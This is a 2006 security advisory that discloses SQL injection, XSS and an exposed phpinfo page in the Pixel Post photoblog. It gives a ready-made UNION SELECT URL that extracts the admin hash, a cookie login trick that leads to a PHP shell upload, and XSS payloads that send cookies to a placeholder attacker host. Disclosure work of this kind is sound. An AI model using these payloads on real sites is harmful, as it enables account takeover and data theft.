<<< Date Index >>>     <<< Thread Index >>>

Pixel Post Multiple Vulnerabilities



/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST] - Advisory #19 - 04/03/06
--------------------------------------------------------
Program: Pixel Post
Homepage: http://www.pixelpost.org/
Vulnerable Versions: 1.4.3, 1.5 beta1 and possibly lower versions.
Risk: High!
Impact: XSS, and SQL Injection providing full access to admin area, providing 
upload any type of files capabilities.. :D

-==Pixel Post Multiple Vulnerabilities==-
---------------------------------------------------------

- Description
---------------------------------------------------------
Pixelpost is a photoblog application powered by PHP and MySQL. It's developed 
and maintained by photobloggers who like to keep the meaning behind 
photoblogging in mind, the photography, and not about the 311 hacks you would 
have to get through to get your regular blog to work like...

- Tested
---------------------------------------------------------
localhost + many sites

- Explotation
---------------------------------------------------------

1)

Vulnerable code:

magic_quotes_gpc must be Off in order to exploit it.

==[ index.php 135-147 ]==========================
[...]
if($_GET['showimage'] == "") {
        $row = sql_array("select * from ".$pixelpost_db_prefix."pixelpost where 
datetime<='$cdate' order by datetime DESC limit 0,1");
        } else {
                 $row = sql_array("select * from 
".$pixelpost_db_prefix."pixelpost where (id='".$_GET['showimage']."')");
        }
if(!$row['image']) {
            echo "Coming Soon! Nothing to show. No image to show here!";
    exit;
    }
$image_name         = $row['image'];
$image_title        = pullout($row['headline']);
$image_id           = $row['id'];
$image_datetime     = $row['datetime']; 
[...]
==[ end index.php ]==========================


$showimage is the variable that is not properly sanitized (or not at all) and 
it's on line 138 that we can get advantage from this.

Since the application prevents PHP or MySQL Errors from being shown, we have to 
fetch the data replacing the one that was supposed to be fetched. So that 
$row[] is going to fetch what we specify and then print it on the page.

With this vulnerability we can fetch almost any data from the database, and 
from any tables.

PoC:
---------------------------------------------------------

http://[site]/[pixelpost_path]/?showimage=')%20UNION%20SELECT%20template%20as%20id,
%20email%20as%20headline,%20admin%20as%20datetime,%20password%20as%20body,
%20sitetitle%20as%20category,%20langfile%20as%20image%20FROM%20pixelpost_config/*

With this you can see on the frontpage, the username of the admin, and below 
resides the md5 hash of the admin.

It's not necesarry to crack it since you can log in to the admin through a 
cookie with the md5 hash.

pixelpost_admin=[hash]

Once having access to the admin area, you can upload any type of files, since 
file types or extensions are not checked.

So you can upload a PHP Shell or whatever. And depending on Server 
Configuration gain system access.


2)

Also by default you can see the System Configuration by viewing: 

http://[site]/[pixelpost_path]/includes/phpinfo.php

==[ includes/phpinfo.php ]==========================
<?
phpinfo();
?>
==[ end includes/phpinfo.php ]======================

Which isn't restricted at all.


3)

Another SQL Injection resides when modifying the USER_AGENT, HTTP_REFERER and 
HTTP_HOST

The script doesn't sanitize this variables at all in includes/functions.php

==[ includes/functions.php 159-183 ]==========================
[...]
function book_visitor($str)
{
        // book a visitor
        $datetime = gmdate("Y-m-d H:i:s",gmdate("U")+(3600 * 
$cfgrow['timezone']));
        $host = $_SERVER['HTTP_HOST'];
        $referer = $_SERVER['HTTP_REFERER'];

        // don't book a referer from self
        $refererhost = parse_url($referer);
        $refererhost = $refererhost['host'];
        if($refererhost == $host)
        {
        $referer = "";
        }
        $ua = $_SERVER['HTTP_USER_AGENT'];
        $ip = $_SERVER['REMOTE_ADDR'];
        $ruri = $_SERVER['REQUEST_URI'];
        // ### if cookie lastvisit not set, count the people!
        if(!isset($_COOKIE['lastvisit']))
        {
                $query = "insert into $str(id,datetime,host,referer,ua,ip,ruri)
                
VALUES('NULL','$datetime','$host','$referer','$ua','$ip','$ruri')";
        $result = mysql_query($query);
        }
}
[...]
==[ end includes/functions.php ]==============================


4)

You can perform a XSS attack when commenting a post because the comment, the 
name, the url, and nor the email are properly sanitized.

Comment: 
<img src="javascript:alert('xss')"> (IE and Opera)
<img src="javascript:document.location='http://[evil]/
cookie.php?cookie='+document.cookie"> (Steal cookies)

<a href="javascript:alert('xss')">sarasa</a> (IE, Opera, Mozilla and probably 
all major browsers, but the user must click the link in order to succed)
<a 
href="javascript:document.location='http://[evil]/cookie.php?cookie='+document.cookie">sarasa</a>
 (Steal cookies)

There are lots of things you can do with a bit of imagination.



The application was not fully tested and many other vulnerabilities are 
probably present (Almost sure!)


- References
--------------------------------------------------------
http://www.neosecurityteam.net/index.php?action=advisories&id=19

- Credits
-------------------------------------------------
Discovered by Knightmare -> mr.knightmarex [at] gmail [at] com

[ 3KLabs ] :: [ http://www.3klabs.com/ ]

And Paisterist -> paisterist.nst [at] gmail [dot] com

[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/


- Greets
--------------------------------------------------------
Mike
Guille
Zeus54
HaCkZaTaN
K4P0
Daemon21
Link
LINUX

Argentina, Mexico, Colombia, Chile, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@ @@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/

/* EOF */